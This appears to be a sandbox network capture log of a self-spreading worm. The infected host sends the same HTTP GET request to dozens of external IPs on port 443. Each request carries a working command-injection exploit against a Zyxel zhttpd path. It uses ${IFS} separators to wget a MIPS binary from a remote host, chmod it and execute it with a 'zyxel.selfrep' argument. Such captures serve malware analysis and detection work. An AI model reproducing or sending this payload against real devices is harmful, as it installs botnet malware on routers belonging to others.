                                                Jan 29, 2024 07:07:49.368329048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4678192.168.2.235844685.72.192.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368365049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4679192.168.2.234409441.242.220.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368421078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4680192.168.2.2346636181.241.18.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368458986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4681192.168.2.235590218.59.167.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368494987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4682192.168.2.2354320148.202.72.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368518114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4683192.168.2.233571062.243.35.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368541956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4684192.168.2.2346386205.133.89.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368603945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4685192.168.2.234913087.54.6.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368640900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4686192.168.2.2358822167.130.233.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368675947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4687192.168.2.235636841.149.120.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368716955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4688192.168.2.234271688.109.193.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368752956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4689192.168.2.2340330139.197.3.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368787050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4690192.168.2.2348404182.169.88.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368838072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4691192.168.2.2346424120.132.69.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368859053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4692192.168.2.2341662147.131.93.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368895054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4693192.168.2.2333450192.247.11.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368940115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4694192.168.2.2357488162.22.138.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.368971109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4695192.168.2.2341076117.80.93.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369021893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4696192.168.2.2345270144.195.4.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369060040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4697192.168.2.2359482185.196.251.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369090080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4698192.168.2.234874012.178.254.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369127035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4699192.168.2.2357978198.231.147.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369168997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4700192.168.2.2352808190.0.200.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369203091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4701192.168.2.2359008157.250.243.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369240046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4702192.168.2.233613882.232.182.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369285107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4703192.168.2.234467892.118.237.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369299889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4704192.168.2.234332423.245.158.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369333029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4705192.168.2.235915237.75.124.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369375944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4706192.168.2.2349136191.216.20.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369414091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4707192.168.2.2356562165.40.239.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369465113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4708192.168.2.234125639.119.111.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369498968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4709192.168.2.2343052210.208.95.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369529963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4710192.168.2.234633612.229.122.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369569063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4711192.168.2.2336432194.154.6.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369626999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4712192.168.2.235770441.107.86.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369647026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4713192.168.2.2356954147.176.130.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369682074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4714192.168.2.2348754219.250.158.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369729042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4715192.168.2.2353118108.119.44.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369769096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4716192.168.2.233690818.90.133.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369785070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4717192.168.2.2342374128.229.107.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369858027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4718192.168.2.2358828219.193.40.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369895935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4719192.168.2.23345221.245.208.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369924068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4720192.168.2.235502871.249.94.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.369952917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4721192.168.2.2357690121.248.190.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370012045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4722192.168.2.2353392152.248.32.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370037079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4723192.168.2.236070679.237.3.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370069981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4724192.168.2.2358998119.200.226.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370132923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4725192.168.2.234272427.13.235.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370171070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4726192.168.2.235877620.156.203.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370183945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4727192.168.2.2338374152.131.20.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370224953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4728192.168.2.235670874.60.230.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370260954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4729192.168.2.23469381.40.226.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370318890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4730192.168.2.235956864.239.240.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370363951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4731192.168.2.2345836160.140.72.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370392084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4732192.168.2.2353572203.65.196.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370435953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4733192.168.2.2342596210.19.143.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370481968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4734192.168.2.233830417.185.105.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370527029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4735192.168.2.2349434153.44.140.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370582104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4736192.168.2.23406389.138.78.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370616913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4737192.168.2.2338840167.24.70.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370649099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4738192.168.2.235678096.5.14.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370697975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4739192.168.2.234655049.194.194.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370733976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4740192.168.2.233594445.247.36.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:49.370755911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4741192.168.2.234716270.219.161.86443
                                                TimestampBytes transferredDirectionData
